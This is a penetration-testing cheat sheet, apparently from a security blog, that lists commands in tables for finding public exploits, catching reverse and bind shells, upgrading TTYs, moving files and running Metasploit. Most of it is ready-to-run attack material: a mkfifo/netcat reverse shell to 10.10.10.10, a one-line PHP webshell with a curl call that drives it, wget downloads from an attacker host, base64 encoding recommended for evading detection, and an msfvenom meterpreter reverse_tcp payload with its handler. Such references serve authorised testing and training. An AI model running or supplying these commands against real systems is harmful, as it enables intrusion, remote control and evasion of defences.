Welcome to the blog's Exploitation Cheat Sheet! I will be actively updating it through commits as needed.
Exploits
| Public Exploits | Description |
|---|---|
searchsploit openssh 7.2 |
Search for public exploits in exploitdb. Try to search online too |
searchsploit -m linux/remote/45233.py |
Get the PoC or exploit script |
| https://swisskyrepo.github.io/PayloadsAllTheThings | PayloadsAllTheThings |
| https://book.hacktricks.wiki/en/index.html | HackTricks |
Payloads & Shells
| Payloads & Shells | Description |
|---|---|
nc -lvnp 4444 |
Start a nc listener, verbose mode, DNS resolution disabled in a local port |
nc 10.10.10.10 4444 |
Connect to a bind shell started on the remote server |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ | Reverse shells cheat sheet. |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/ | Bind shells cheat sheet. |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f |/bin/sh -i 2>&1| nc 10.10.10.10 4444 >/tmp/f (reverse)rm /tmp/f;mkfifo /tmp/f;cat /tmp/f |/bin/bash -i 2>&1|nc -lvp 4444 >/tmp/f (bind) |
Forward Shells |
script /dev/null -c bashctrl+zstty raw -echo; fgreset xtermexport TERM=xtermexport SHELL=bashstty rows X columns Y |
TTY upgrading |
python -c 'import pty; pty.spawn("/bin/bash")' |
TTY upgrading (python) |
echo "<?php system($_GET['cmd']);?>" > /var/www/html/shell.php |
Create a webshell php file |
curl http://10.10.10.10/shell.php?cmd=id |
Execute a command on an uploaded webshell |
| Transferring Files | |
python3 -m http.server 4444 |
Start a local webserver |
wget http://10.10.10.10:4444/linenum.sh |
Download a file on the remote server from our local machine |
url http://10.10.10.10:4444/linenum.sh -o linenum.sh |
Download a file on the remote server from our local machine |
scp linenum.sh user@10.10.10.10:/tmp/linenum.sh |
Transfer a file to the remote server with scp (requires SSH access with password) |
base64 linenum.sh -w 0 |
Convert a file to base64, useful to avoid detection |
echo f0VMR...SNIO...InmDwU | base64 -d > linenum.sh |
Convert a file from base64 back to its orig |
md5sum shell |
Check the file's md5sum to ensure it converted correctly |
MSF
| Metasploit Command | Description |
|---|---|
msfconsolemsfdb run (recommended) |
Start the Metasploit Framework |
workspace -a nibbles |
"nibbles" workspace creation |
workspaceworkspace nibbles |
Display workspaces and change to the "nibbles" workspace |
search exploit eternalblue |
Search for public exploits in MSF |
use exploit/windows/smb/ms17_010_psexec |
Start using an MSF module |
infoshow optionsshow advanced options |
Show info and required options for an MSF module |
set RHOSTS 10.10.10.10set LHOSTS eth0 |
Set a value for an MSF module option |
check |
Test if the target server is vulnerable (not supported in some exploits) |
exploit |
Run the exploit on the target server. |
sessionssessions 1 |
Show sessions and session 1 selection |
background |
Send current session to bg |
msfvenom -p windows/meterpreter/reverse_tcp --platform windows LHOST=192.168.0.31 LPORT=443 -f exe -o example.exemsfdb runuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 10.10.14.120SET LPORT 443run |
Exploits generation and listening port setting |